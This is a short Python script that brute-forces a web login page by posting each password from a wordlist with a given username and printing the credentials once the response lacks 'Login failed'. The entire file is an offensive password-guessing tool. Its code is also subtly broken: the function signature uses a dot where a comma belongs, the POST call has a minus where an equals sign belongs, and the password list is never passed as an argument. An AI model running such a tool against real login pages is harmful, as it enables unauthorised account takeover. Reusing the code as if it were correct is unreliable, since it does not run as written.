#!/usr/bin/python

import requests


def bruteforce(username.url):
		for password in passwords:
			password = password.strip()
			print("[!!] Trying To Bruteforce With Password: " + password)
			data_dictionary = {"username":username,"password":password,"Login":"submit"}
			response = requests.post(url, data-data_dictionary)
			if "Login failed" in response.content:
				pass
			else:
					print("[+] Username: -->" + username)
					print("[+] Password: -->" + password)
					exit()


page_url = "enter url here for interaction"
username = raw_input("* Enter Username For Specified Page: ")

with open("passwordlist.txt", "r") as passwords:
		bruteforce(username,page_url)

print("[!!] password is not in this list!")
